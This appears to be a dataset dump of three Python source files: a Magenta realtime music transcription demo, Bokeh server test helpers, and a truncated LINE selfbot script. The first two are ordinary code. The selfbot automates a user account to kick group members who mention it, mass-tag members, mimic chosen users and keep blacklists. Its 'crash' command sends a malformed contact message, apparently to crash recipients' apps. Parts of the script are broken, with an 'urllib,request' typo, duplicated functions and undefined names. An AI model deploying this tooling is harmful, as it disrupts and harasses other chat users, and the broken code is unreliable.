source
stringlengths
3
86
python
stringlengths
75
1.04M
onsets_frames_transcription_realtime.py
# Copyright 2020 The Magenta Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """Experimental realtime transcription demo.""" import multiprocessing import threading from absl import app from absl import flags import attr from colorama import Fore # noqa from colorama import Style # noqa from magenta.models.onsets_frames_transcription.realtime import audio_recorder from magenta.models.onsets_frames_transcription.realtime import tflite_model import numpy as np flags.DEFINE_string('model_path', 'onsets_frames_wavinput.tflite', 'File path of TFlite model.') flags.DEFINE_string('mic', None, 'Optional: Input source microphone ID.') flags.DEFINE_float('mic_amplify', 30.0, 'Multiply raw audio mic input') flags.DEFINE_string( 'wav_file', None, 'If specified, will decode the first 10 seconds of this wav file.') flags.DEFINE_integer( 'sample_rate_hz', 16000, 'Sample Rate. The model expects 16000. However, some microphones do not ' 'support sampling at this rate. 
In that case use --sample_rate_hz 48000 and' 'the code will automatically downsample to 16000') FLAGS = flags.FLAGS class TfLiteWorker(multiprocessing.Process): """Process for executing TFLite inference.""" def __init__(self, model_path, task_queue, result_queue): multiprocessing.Process.__init__(self) self._model_path = model_path self._task_queue = task_queue self._result_queue = result_queue self._model = None def setup(self): if self._model is not None: return self._model = tflite_model.Model(model_path=self._model_path) def run(self): self.setup() while True: task = self._task_queue.get() if task is None: self._task_queue.task_done() return task(self._model) self._task_queue.task_done() self._result_queue.put(task) @attr.s class AudioChunk(object): serial = attr.ib() samples = attr.ib(repr=lambda w: '{} {}'.format(w.shape, w.dtype)) class AudioQueue(object): """Audio queue.""" def __init__(self, callback, audio_device_index, sample_rate_hz, model_sample_rate, frame_length, overlap): # Initialize recorder. 
downsample_factor = sample_rate_hz / model_sample_rate self._recorder = audio_recorder.AudioRecorder( sample_rate_hz, downsample_factor=downsample_factor, device_index=audio_device_index) self._frame_length = frame_length self._overlap = overlap self._audio_buffer = np.array([], dtype=np.int16).reshape(0, 1) self._chunk_counter = 0 self._callback = callback def start(self): """Start processing the queue.""" with self._recorder: timed_out = False while not timed_out: assert self._recorder.is_active new_audio = self._recorder.get_audio(self._frame_length - len(self._audio_buffer)) audio_samples = np.concatenate( (self._audio_buffer, new_audio[0] * FLAGS.mic_amplify)) # Extract overlapping first_unused_byte = 0 for pos in range(0, audio_samples.shape[0] - self._frame_length, self._frame_length - self._overlap): self._callback( AudioChunk(self._chunk_counter, audio_samples[pos:pos + self._frame_length])) self._chunk_counter += 1 first_unused_byte = pos + self._frame_length # Keep the remaining bytes for next time self._audio_buffer = audio_samples[first_unused_byte:] # This actually executes in each worker thread! 
class OnsetsTask(object): """Inference task.""" def __init__(self, audio_chunk: AudioChunk): self.audio_chunk = audio_chunk self.result = None def __call__(self, model): samples = self.audio_chunk.samples[:, 0] self.result = model.infer(samples) self.timestep = model.get_timestep() def result_collector(result_queue): """Collect and display results.""" def notename(n, space): if space: return [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '][n % 12] return [ Fore.BLUE + 'A' + Style.RESET_ALL, Fore.LIGHTBLUE_EX + 'A#' + Style.RESET_ALL, Fore.GREEN + 'B' + Style.RESET_ALL, Fore.CYAN + 'C' + Style.RESET_ALL, Fore.LIGHTCYAN_EX + 'C#' + Style.RESET_ALL, Fore.RED + 'D' + Style.RESET_ALL, Fore.LIGHTRED_EX + 'D#' + Style.RESET_ALL, Fore.YELLOW + 'E' + Style.RESET_ALL, Fore.WHITE + 'F' + Style.RESET_ALL, Fore.LIGHTBLACK_EX + 'F#' + Style.RESET_ALL, Fore.MAGENTA + 'G' + Style.RESET_ALL, Fore.LIGHTMAGENTA_EX + 'G#' + Style.RESET_ALL, ][n % 12] # + str(n//12) print('Listening to results..') # TODO(mtyka) Ensure serial stitching of results (no guarantee that # the blocks come in in order but they are all timestamped) while True: result = result_queue.get() serial = result.audio_chunk.serial result_roll = result.result if serial > 0: result_roll = result_roll[4:] for notes in result_roll: for i in range(6, len(notes) - 6): note = notes[i] is_frame = note[0] > 0.0 notestr = notename(i, not is_frame) print(notestr, end='') print('|') def main(argv): if len(argv) > 1: raise app.UsageError('Too many command-line arguments.') results = multiprocessing.Queue() results_thread = threading.Thread(target=result_collector, args=(results,)) results_thread.start() model = tflite_model.Model(model_path=FLAGS.model_path) overlap_timesteps = 4 overlap_wav = model.get_hop_size( ) * overlap_timesteps + model.get_window_length() if FLAGS.wav_file: wav_data = open(FLAGS.wav_file, 'rb').read() samples = audio_recorder.wav_data_to_samples(wav_data, model.get_sample_rate()) samples = 
samples[:model.get_sample_rate() * 10] # Only the first 10 seconds samples = samples.reshape((-1, 1)) samples_length = samples.shape[0] # Extend samples with zeros samples = np.pad( samples, (0, model.get_input_wav_length()), mode='constant') for i, pos in enumerate( range(0, samples_length - model.get_input_wav_length() + overlap_wav, model.get_input_wav_length() - overlap_wav)): chunk = samples[pos:pos + model.get_input_wav_length()] task = OnsetsTask(AudioChunk(i, chunk)) task(model) results.put(task) else: tasks = multiprocessing.JoinableQueue() # Make and start the workers num_workers = 4 workers = [ TfLiteWorker(FLAGS.model_path, tasks, results) for i in range(num_workers) ] for w in workers: w.start() audio_feeder = AudioQueue( callback=lambda audio_chunk: tasks.put(OnsetsTask(audio_chunk)), audio_device_index=FLAGS.mic if FLAGS.mic is None else int(FLAGS.mic), sample_rate_hz=int(FLAGS.sample_rate_hz), model_sample_rate=model.get_sample_rate(), frame_length=model.get_input_wav_length(), overlap=overlap_wav) audio_feeder.start() def console_entry_point(): app.run(main) if __name__ == '__main__': console_entry_point()
test_utils.py
from __future__ import absolute_import import uuid import tempfile import threading import time import unittest import mock #import redis import requests from requests.exceptions import ConnectionError from tornado import ioloop #import zmq from bokeh.tests.test_utils import skipIfPy3 from ..models import user from .. import start, configure from ..app import bokeh_app, app from ..settings import settings as server_settings def wait_flask(): def helper(): try: return requests.get('http://localhost:5006/bokeh/ping') except ConnectionError: return False return wait_until(helper) def wait_redis_gone(port): def helper(): client = redis.Redis(port=port) try: client.ping() return False except redis.ConnectionError: return True return wait_until(helper) def wait_redis_start(port): def helper(): client = redis.Redis(port=port) try: return client.ping() except redis.ConnectionError: pass return wait_until(helper) def wait_until(func, timeout=1.0, interval=0.01): st = time.time() while True: if func(): return True if (time.time() - st) > timeout: return False time.sleep(interval) def recv_timeout(socket, timeout): poll = zmq.Poller() poll.register(socket, zmq.POLLIN) socks = dict(poll.poll(timeout=timeout)) if socks.get(socket, None) == zmq.POLLIN: return socket.recv_multipart() else: return None class BaseBokehServerTestCase(unittest.TestCase): options = {} class MemoryBokehServerTestCase(BaseBokehServerTestCase): @skipIfPy3("gevent does not work in py3.") def setUp(self): #clear tornado ioloop instance server_settings.reset() server_settings.model_backend = {'type' : 'memory'} for k,v in self.options.items(): setattr(server_settings, k, v) bokeh_app.stdout = None bokeh_app.stderr = None self.serverthread = threading.Thread(target=start.start_simple_server) self.serverthread.start() wait_flask() #not great - but no good way to wait for zmq to come up time.sleep(0.1) make_default_user(bokeh_app) def tearDown(self): start.stop() self.serverthread.join() BokehServerTestCase = 
MemoryBokehServerTestCase def make_default_user(bokeh_app): bokehuser = user.new_user(bokeh_app.servermodel_storage, "defaultuser", str(uuid.uuid4()), apikey='nokey', docs=[]) return bokehuser class FlaskClientTestCase(BaseBokehServerTestCase): def setUp(self): server_settings.reset() for k,v in self.options.items(): setattr(server_settings, k, v) server_settings.model_backend = {'type' : 'memory'} configure.configure_flask() with mock.patch('bokeh.utils.logging'): configure.register_blueprint() #ugh..need better way to initialize this app.secret_key = server_settings.secret_key app.debug = True self.client = app.test_client() def tearDown(self): pass
puyself.py
cl = GYE.LINE() cl.login(token="") cl.loginResult() print "\n[CIE LOGIN CIEEEE]" reload(sys) sys.setdefaultencoding('utf-8') helpmsg ="""╠═════════════════ ╠-> Restart ╠-> Mention ╠-> setpoint on/off ╠-> viewlastseen ╠-> Ulti @ ╠-> Speed ╠-> Time ╠-> Friendlist ╠-> id@en ╠-> en@id ╠-> id@jp\n 「+」\n╠-> help protect\n╠-> help self\n╠-> help set\n╠-> help grup\n╠-> help translate ╚═════════════════""" helppro =""" ╠═════════════════ ╠-> protect on/off ╠-> qr on/off ╠-> invite on/off ╠-> cancel on/off ╚═════════════════""" helpmedia =""" ╠═════════════════ ╠-> google (text) ╠-> playstore (text) ╠-> Profileig (username) ╠-> instagram (username) ╠-> wikipedia (text) ╠-> idline (text) ╠-> ytsearch (text) ╠-> Image (text) ╠-> Zodiak tanggal-bulan-tahun ╠-> lirik (text) ╚═════════════════""" helpself =""" ╠═════════════════ ╠-> Me ╠-> Myname: ╠-> Mybio: ╠-> Mypict ╠-> Mycover ╠-> My copy @ ╠-> My backup ╠-> Getgroup image ╠-> Getmid @ ╠-> Getcontact @ ╠-> Getprofile @ ╠-> Getinfo @ ╠-> Getname @ ╠-> Getbio @ ╠-> Getpict @ ╠-> Getcover @ ╠-> Mention ╠-> setpoint on/off ╠-> viewlastseen ╠-> Micadd @ ╠-> Micdel @ ╚═════════════════""" helpset =""" ╠═════════════════ ╠-> qr on/off ╠-> protect on/off ╠-> contact on/off ╠-> autojoin on/off ╠-> auto leave on/off ╠-> cancel on/off ╠-> invite on/off ╠-> autoadd on/off ╠-> like friend ╠-> link on ╠-> respon on/off ╠-> read on/off ╠-> simisimi on/off ╚═════════════════""" helpgrup =""" ╠═════════════════ ╠-> Link on ╠-> Url ╠-> Cancel ╠-> Gcreator ╠-> Kick @ ╠-> Ulti @ ╠-> Gname: ╠-> Gbroadcast: ╠-> Cbroadcast: ╠-> Infogrup ╠-> Gruplist ╠-> Friendlist ╠-> Blacklist ╠-> Ban @ ╠-> Unban @ ╠-> Clearban ╠-> Banlist ╠-> Contact ban ╠-> Midban ╚═════════════════""" helptranslate =""" ╠═════════════════ ╠-> Id@en ╠-> En@id ╠-> Id@jp ╠-> Jp@id ╠-> Id@th ╠-> Th@id ╠-> Id@ar ╠-> Ar@id ╠-> Id@ko ╠-> Ko@id ╠-> Say-id ╠-> Say-en ╠-> Say-jp ╚═════════════════""" KAC=[cl] mid = cl.getProfile().mid Bots=[mid] 
admin=["uac8e3eaf1eb2a55770bf10c3b2357c33"] wait = { "likeOn":False, "alwayRead":False, "detectMention":True, "kickMention":False, "steal":True, 'pap':{}, 'invite':{}, "spam":{}, 'contact':False, 'autoJoin':True, 'autoCancel':{"on":False,"members":5}, 'leaveRoom':True, 'timeline':False, 'autoAdd':True, 'message':"""Thx for add""", "lang":"JP", "comment":"", "commentOn":False, "commentBlack":{}, "wblack":False, "dblack":False, "clock":False, "cNames":"", "cNames":"", "blacklist":{}, "wblacklist":False, "dblacklist":False, "protect":False, "cancelprotect":False, "inviteprotect":False, "linkprotect":False, } wait2 = { "readPoint":{}, "readMember":{}, "setTime":{}, "ROM":{} } mimic = { "copy":False, "copy2":False, "status":False, "target":{} } settings = { "simiSimi":{} } res = { 'num':{}, 'us':{}, 'au':{}, } setTime = {} setTime = wait2['setTime'] mulai = time.time() contact = cl.getProfile() backup = cl.getProfile() backup.displayName = contact.displayName backup.statusMessage = contact.statusMessage backup.pictureStatus = contact.pictureStatus def restart_program(): python = sys.executable os.execl(python, python, * sys.argv) def download_page(url): version = (3,0) cur_version = sys.version_info if cur_version >= version: #If the Current Version of Python is 3.0 or above import urllib,request #urllib library for Extracting web pages try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" req = urllib,request.Request(url, headers = headers) resp = urllib,request.urlopen(req) respData = str(resp.read()) return respData except Exception as e: print(str(e)) else: #If the Current Version of Python is 2.x import urllib2 try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17" req = urllib2.Request(url, headers = headers) response = urllib2.urlopen(req) page = response.read() return page except: 
return"Page Not found" #Finding 'Next Image' from the given raw page def _images_get_next_item(s): start_line = s.find('rg_di') if start_line == -1: #If no links are found then give an error! end_quote = 0 link = "no_links" return link, end_quote else: start_line = s.find('"class="rg_meta"') start_content = s.find('"ou"',start_line+90) end_content = s.find(',"ow"',start_content-90) content_raw = str(s[start_content+6:end_content-1]) return content_raw, end_content def sendAudio(self, to, path): objectId = self.sendMessage(to=to, text=None, contentType = 3).id files = { 'file': open(path, 'rb'), } params = { 'name': 'media', 'oid': objectId, 'size': len(open(path, 'rb').read()), 'type': 'audio', 'ver': '1.0', } data = { 'params': json.dumps(params) } r = self.server.postContent(self.server.LINE_OBS_DOMAIN + '/talk/m/upload.nhn', data=data, files=files) if r.status_code != 201: raise Exception('Upload audio failure.') return True def sendAudio(self, to_, path): M = Message(to=to_,contentType = 3) M.contentMetadata = None M.contentPreview = None M_id = self.Talk.client.sendMessage(0,M).id files = { 'file': open(path, 'rb'), } params = { 'name': 'media', 'oid': M_id, 'size': len(open(path, 'rb').read()), 'type': 'audio', 'ver': '1.0', } data = { 'params': json.dumps(params) } r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files) if r.status_code != 201: raise Exception('Upload image failure.') return True def sendAudioWithURL(self, to_, url): path = 'pythonLiness.data' r = requests.get(url, stream=True) if r.status_code == 200: with open(path, 'w') as f: shutil.copyfileobj(r.raw, f) else: raise Exception('Download Audio failure.') try: self.sendAudio(to_, path) except Exception as e: raise e #Getting all links with the help of '_images_get_next_image' def _images_get_all_items(page): items = [] while True: item, end_content = _images_get_next_item(page) if item == "no_links": break else: items.append(item) #Append all the links in 
the list named 'Links' time.sleep(0.1) #Timer could be used to slow down the request for image downloads page = page[end_content:] return items def download_page(url): version = (3,0) cur_version = sys.version_info if cur_version >= version: #If the Current Version of Python is 3.0 or above import urllib,request #urllib library for Extracting web pages try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" req = urllib,request.Request(url, headers = headers) resp = urllib,request.urlopen(req) respData = str(resp.read()) return respData except Exception as e: print(str(e)) else: #If the Current Version of Python is 2.x import urllib2 try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17" req = urllib2.Request(url, headers = headers) response = urllib2.urlopen(req) page = response.read() return page except: return"Page Not found" def upload_tempimage(client): ''' Upload a picture of a kitten. We don't ship one, so get creative! ''' config = { 'album': album, 'name': 'bot auto upload', 'title': 'bot auto upload', 'description': 'bot auto upload' } print("Uploading image... 
") image = client.upload_from_path(image_path, config=config, anon=False) print("Done") print() def summon(to, nama): aa = "" bb = "" strt = int(14) akh = int(14) nm = nama for mm in nm: akh = akh + 2 aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},""" strt = strt + 6 akh = akh + 4 bb += "\xe2\x95\xa0 @x \n" aa = (aa[:int(len(aa)-1)]) msg = Message() msg.to = to msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90" msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'} print "[Command] Tag All" try: cl.sendMessage(msg) except Exception as error: print error def waktu(secs): mins, secs = divmod(secs,60) hours, mins = divmod(mins,60) return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs) def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX... 
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"] for texX in tex: for command in commands: if string ==command: return True return False def sendMessage(to, text, contentMetadata={}, contentType=0): mes = Message() mes.to, mes.from_ = to, profile.mid mes.text = text mes.contentType, mes.contentMetadata = contentType, contentMetadata if to not in messageReq: messageReq[to] = -1 messageReq[to] += 1 def bot(op): try: if op.type == 0: return if op.type == 5: if wait["autoAdd"] == True: cl.findAndAddContactsByMid(op.param1) if (wait["message"] in [""," ","\n",None]): pass else: cl.sendText(op.param1,str(wait["message"])) if op.type == 26: msg = op.message if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True: text = msg.text if text is not None: cl.sendText(msg.to,text) if op.type == 19: if mid in op.param3: wait["blacklist"][op.param2] = True if op.type == 22: if wait["leaveRoom"] == True: cl.leaveRoom(op.param1) if op.type == 24: if wait["leaveRoom"] == True: cl.leaveRoom(op.param1) if op.type == 26: msg = op.message if msg.toType == 0: msg.to = msg.from_ if msg.from_ == mid: if "join:" in msg.text: list_ = msg.text.split(":") try: cl.acceptGroupInvitationByTicket(list_[1],list_[2]) G = cl.getGroup(list_[1]) G.preventJoinByTicket = True cl.updateGroup(G) except: cl.sendText(msg.to,"error") if msg.toType == 1: if wait["leaveRoom"] == True: cl.leaveRoom(msg.to) if msg.contentType == 16: url = msg.contentMetadata["postEndUrl"] cl.like(url[25:58], url[66:], likeType=1001) if op.type == 26: msg = op.message if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True: text = msg.text if text is not None: cl.sendText(msg.to,text) if op.type == 26: msg = op.message if msg.to in settings["simiSimi"]: if settings["simiSimi"][msg.to] == True: if msg.text is not None: text = msg.text r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + 
"&key=beta1.nt") data = r.text data = json.loads(data) if data['status'] == 200: if data['result']['result'] == 100: cl.sendText(msg.to, "[From Simi]\n" + data['result']['response'].encode('utf-8')) if 'MENTION' in msg.contentMetadata.keys() != None: if wait["detectMention"] == True: contact = cl.getContact(msg.from_) cName = contact.displayName balas = ["",cName + " what ?, ", cName + " Kenapa? pc dia aja klo penting, " + cName + "?", "Ada Perlu apa? jgn tag doang, " + cName + "?","Hmm?, ", "Jgn tag tag ah, "] ret_ = "." + random.choice(balas) name = re.findall(r'@(\w+)', msg.text) mention = ast.literal_eval(msg.contentMetadata['MENTION']) mentionees = mention['MENTIONEES'] for mention in mentionees: if mention['M'] in Bots: cl.sendText(msg.to,ret_) break if 'MENTION' in msg.contentMetadata.keys() != None: if wait["kickMention"] == True: contact = cl.getContact(msg.from_) cName = contact.displayName balas = ["",cName + " Ngapain Ngetag?, ", cName + " Kenapa Tag saya?, " + cName + "?", "Ada Perlu apa, " + cName + "?","Tag doang tidak perlu., ", "Tersummon -_-, "] ret_ = "**Auto Respond** " + random.choice(balas) name = re.findall(r'@(\w+)', msg.text) mention = ast.literal_eval(msg.contentMetadata['MENTION']) mentionees = mention['MENTIONEES'] for mention in mentionees: if mention['M'] in Bots: cl.sendText(msg.to,ret_) cl.kickoutFromGroup(msg.to,[msg.from_]) break if msg.contentType == 13: if wait['invite'] == True: _name = msg.contentMetadata["displayName"] invite = msg.contentMetadata["mid"] groups = cl.getGroup(msg.to) pending = groups.invitee targets = [] for s in groups.members: if _name in s.displayName: cl.sendText(msg.to, _name + " Berada DiGrup Ini") else: targets.append(invite) if targets == []: pass else: for target in targets: try: cl.findAndAddContactsByMid(target) cl.inviteIntoGroup(msg.to,[target]) cl.sendText(msg.to,"Invite " + _name) wait['invite'] = False break except: cl.sendText(msg.to,"Error") wait['invite'] = False break #if msg.contentType == 
13: # if wait["steal"] == True: # _name = msg.contentMetadata["displayName"] # copy = msg.contentMetadata["mid"] # groups = cl.getGroup(msg.to) # pending = groups.invitee # targets = [] # for s in groups.members: # if _name in s.displayName: # print "[Target] Stealed" # break # else: # targets.append(copy) # if targets == []: # pass # else: # for target in targets: # try: # cl.findAndAddContactsByMid(target) # contact = cl.getContact(target) # cu = cl.channel.getCover(target) # path = str(cu) # image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus # cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage) # cl.sendText(msg.to,"Profile Picture " + contact.displayName) # cl.sendImageWithURL(msg.to,image) # cl.sendText(msg.to,"Cover " + contact.displayName) # cl.sendImageWithURL(msg.to,path) # wait["steal"] = False # break # except: # pass if wait["alwayRead"] == True: if msg.toType == 0: cl.sendChatChecked(msg.from_,msg.id) else: cl.sendChatChecked(msg.to,msg.id) if op.type == 25: msg = op.message if msg.contentType == 13: if wait["wblack"] == True: if msg.contentMetadata["mid"] in wait["commentBlack"]: cl.sendText(msg.to,"In Blacklist") wait["wblack"] = False else: wait["commentBlack"][msg.contentMetadata["mid"]] = True wait["wblack"] = False cl.sendText(msg.to,"Nothing") elif wait["dblack"] == True: if msg.contentMetadata["mid"] in wait["commentBlack"]: del wait["commentBlack"][msg.contentMetadata["mid"]] cl.sendText(msg.to,"Done") wait["dblack"] = False else: wait["dblack"] = False cl.sendText(msg.to,"Not in Blacklist") elif wait["wblacklist"] == True: if msg.contentMetadata["mid"] in wait["blacklist"]: cl.sendText(msg.to,"In Blacklist") wait["wblacklist"] = False else: wait["blacklist"][msg.contentMetadata["mid"]] = True wait["wblacklist"] = False cl.sendText(msg.to,"Done") elif wait["dblacklist"] == True: if msg.contentMetadata["mid"] in wait["blacklist"]: del 
wait["blacklist"][msg.contentMetadata["mid"]] cl.sendText(msg.to,"Done") wait["dblacklist"] = False else: wait["dblacklist"] = False cl.sendText(msg.to,"Done") elif wait["contact"] == True: msg.contentType = 0 cl.sendText(msg.to,msg.contentMetadata["mid"]) if 'displayName' in msg.contentMetadata: contact = cl.getContact(msg.contentMetadata["mid"]) try: cu = cl.channel.getCover(msg.contentMetadata["mid"]) except: cu = "" cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu)) else: contact = cl.getContact(msg.contentMetadata["mid"]) try: cu = cl.channel.getCover(msg.contentMetadata["mid"]) except: cu = "" cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu)) elif msg.contentType == 16: if wait["timeline"] == True: msg.contentType = 0 if wait["lang"] == "JP": msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"] else: msg.text = msg.contentMetadata["postEndUrl"] cl.sendText(msg.to,msg.text) elif msg.text is None: return elif msg.text.lower() == 'help': if wait["lang"] == "JP": cl.sendText(msg.to,helpmsg) else: cl.sendText(msg.to,helpmsg) elif msg.text.lower() == 'help protect': if wait["lang"] == "JP": cl.sendText(msg.to,helppro) else: cl.sendText(msg.to,helppro) elif msg.text.lower() == 'help self': if wait["lang"] == "JP": cl.sendText(msg.to,helpself) else: cl.sendText(msg.to,helpself) elif msg.text.lower() == 'help grup': if wait["lang"] == "JP": cl.sendText(msg.to,helpgrup) else: cl.sendText(msg.to,helpgrup) elif msg.text.lower() == 'help set': if wait["lang"] == "JP": cl.sendText(msg.to,helpset) else: 
cl.sendText(msg.to,helpset) elif msg.text.lower() == 'help media': if wait["lang"] == "JP": cl.sendText(msg.to,helpmedia) else: cl.sendText(msg.to,helpmedia) elif msg.text.lower() == 'help translate': if wait["lang"] == "JP": cl.sendText(msg.to,helptranslate) else: cl.sendText(msg.to,helptranslate) #elif msg.text in ["Sp","Speed","speed"]: # start = time.time() # cl.sendText(msg.to, "「Come Here」") # elapsed_time = time.time() - start # cl.sendText(msg.to, "%sseconds" % (elapsed_time)) elif msg.text == ".Speed": cl.sendText(msg.to,"「Come Here」") start = time.time() for i in range(3000): 1+1 elsp = time.time() - start cl.sendText(msg.to,"%s/Detikี" % (elsp)) elif msg.text.lower() == 'crash': msg.contentType = 13 msg.contentMetadata = {'mid': "u1f41296217e740650e0448b96851a3e2',"} cl.sendMessage(msg) elif msg.text.lower() == 'me': msg.contentType = 13 msg.contentMetadata = {'mid': mid} cl.sendMessage(msg) elif ".fb" in msg.text: a = msg.text.replace(".fb","") b = urllib.quote(a) cl.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Proses") cl.sendText(msg.to, "https://www.facebook.com" + b) cl.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Sukses") #========================== FOR COMMAND BOT STARTING =============================# elif msg.text.lower() == 'contact on': if wait["contact"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") else: cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") else: wait["contact"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") else: cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") elif msg.text.lower() == 'contact off': if wait["contact"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ") else: cl.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ") else: wait["contact"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ") else: cl.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ") elif msg.text.lower() == 'protect on': if wait["protect"] == True: if wait["lang"] 
== "JP": cl.sendText(msg.to,"Protecion Already On") else: cl.sendText(msg.to,"Protecion Already On") else: wait["protect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protecion Already On") else: cl.sendText(msg.to,"Protecion Already On") elif msg.text.lower() == 'qr on': if wait["linkprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already On") else: cl.sendText(msg.to,"Protection Qr already On") else: wait["linkprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already On") else: cl.sendText(msg.to,"Protection Qr already On") elif msg.text.lower() == 'invite on': if wait["inviteprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Invite already On") else: cl.sendText(msg.to,"Protection Invite already On") else: wait["inviteprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"ρяσтє¢тισи ιиνιтє ѕєт тσ σи") else: cl.sendText(msg.to,"ρяσтє¢тισи ιиνιтє αℓяєα∂у σи") elif msg.text.lower() == 'cancel on': if wait["cancelprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи") else: cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи") else: wait["cancelprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи") else: cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи") elif msg.text.lower() == 'autojoin on': if wait["autoJoin"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи") else: wait["autoJoin"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи") elif msg.text.lower() == 'autojoin off': if wait["autoJoin"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff") else: wait["autoJoin"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff") 
elif msg.text.lower() == 'protect off': if wait["protect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection already Off") else: cl.sendText(msg.to,"Protection already Off") else: wait["protect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"ρяσтє¢тισи ѕєт тσ σff") else: cl.sendText(msg.to,"ρяσтє¢тισи αℓяєα∂у σff") elif msg.text.lower() == 'qr off': if wait["linkprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already off") else: cl.sendText(msg.to,"Protection Qr already off") else: wait["linkprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already Off") else: cl.sendText(msg.to,"Protection Qr already Off") elif msg.text.lower() == 'invit off': if wait["inviteprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Invite already Off") else: cl.sendText(msg.to,"Protection Invite already Off") else: wait["inviteprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Invite already Off") else: cl.sendText(msg.to,"Protection Invite already Off") elif msg.text.lower() == 'cancel off': if wait["cancelprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Cancel already Off") else: cl.sendText(msg.to,"Protection Cancel already Off") else: wait["cancelprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Cancel already Off") else: 